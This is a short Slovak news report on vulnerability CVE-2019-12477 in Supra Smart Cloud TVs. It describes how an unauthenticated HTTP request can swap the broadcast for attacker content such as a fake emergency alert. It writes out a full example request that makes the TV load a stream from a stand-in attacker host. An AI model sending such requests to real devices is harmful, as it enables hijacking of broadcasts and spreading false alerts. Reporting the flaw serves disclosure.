Na televízoroch Supra Smart Cloud TV zraniteľnosť (CVE-2019-12477), ktorá vám umožňuje nahradiť aktuálne prezeraný program obsahom útočníka. Ako príklad je demonštrovaný výstup fiktívneho varovania o mimoriadnej situácii.
Na útok stačí poslať špeciálne pripravenú sieťovú požiadavku, ktorá nevyžaduje autentifikáciu. Konkrétne môžete získať prístup k obslužnému programu „/remote/media_control?action=setUri&uri=“ zadaním adresy URL súboru m3u8 s parametrami videa, napríklad „http://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker .com/fake_broadcast_message.m3u8.“
Vo väčšine prípadov je prístup k IP adrese televízora obmedzený na internú sieť, ale keďže sa požiadavka odosiela cez HTTP, je možné použiť metódy na prístup k interným zdrojom, keď používateľ otvorí špeciálne navrhnutú externú stránku (napríklad pod maska žiadosti o obrázok alebo pomocou ).
Zdroj: opennet.ru